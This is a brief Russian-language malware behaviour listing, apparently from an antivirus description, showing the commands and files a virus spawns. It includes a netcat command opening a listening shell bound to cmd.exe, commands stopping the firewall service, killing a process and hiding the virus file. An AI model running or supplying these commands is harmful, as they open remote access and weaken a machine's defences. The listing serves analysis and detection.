Техническая информация
- <SYSTEM32>\nc.exe -L -p 2008 -e cmd.exe
- <SYSTEM32>\ping.exe 127.0.0.1 -n 2
- <SYSTEM32>\taskkill.exe /f /im explore.exe
- <SYSTEM32>\ping.exe 127.0.0.1 -n 3
- <SYSTEM32>\net.exe stop sharedaccess
- <SYSTEM32>\net1.exe stop sharedaccess
- <SYSTEM32>\attrib.exe <Полный путь к вирусу> +h +s
- <SYSTEM32>\nc.exe
- <LS_APPDATA>\nc.exe
- %TEMP%\~1.bat
- <Полный путь к вирусу>
- %TEMP%\~1.bat
- ClassName: '' WindowName: ''